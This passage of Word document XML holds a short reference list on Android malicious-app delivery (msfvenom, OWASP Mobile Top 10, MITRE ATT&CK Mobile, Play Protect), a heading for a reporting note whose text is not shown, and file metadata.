        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• msfvenom — Android payloads (Rapid7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1A2B4C" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• OWASP Mobile Top 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FBE1EA" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Android — app sandbox &amp; Play Protect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4416D002" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• MITRE ATT&amp;CK Mobile — Deliver Malicious App</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A36BC43" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• [Video] Android payload with msfvenom (educational)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9540"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA5F09" w14:paraId="780AE3D7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F4E3CC"/>
          </w:tcPr>
          <w:p w14:paraId="60E12084" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="243027"/>
              </w:rPr>
              <w:t>⚠ Reporting note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37A9616A" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>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p w14:paraId="54D3A21F" w14:textId="77777777" w:rsidR="00224615" w:rsidRDefault="00224615"/>
    <w:sectPr w:rsidR="00224615"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692720">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1255015830">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="840045083">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2140537601">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="2011709190">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="851188217">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="271792559">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1762724783">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="13975068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615"/>
    <w:rsid w:val="0029639D"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00C9221E"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00E35155"/>
    <w:rsid w:val="00EA5F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5C781"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{A5F1E2FB-9015-7943-8BCE-669CD56D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1350</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Elhadad, Saaid J (Capital)</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-03T03:27:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>